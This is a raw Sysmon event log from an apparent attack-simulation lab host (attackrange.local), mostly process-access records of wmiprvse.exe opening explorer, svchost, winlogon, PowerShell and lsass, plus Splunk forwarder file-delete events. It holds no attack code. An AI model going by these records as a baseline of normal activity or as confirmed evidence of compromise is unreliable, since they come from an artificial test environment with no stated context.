22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000001697161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.021{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E3DF90A342779A1BFB10A2008A8D9446,SHA256=5CA4D34D5317B85B042ED8FCD55C55A7DA40194BF9D411BC4930AED931B2AFF2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000001697158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.021{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=262F56E04513B42E681E58B70F3767F5,SHA256=E355336F194587983BAE141B013CCFC5FD8EFEFD81E841845D766AA20F8243C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 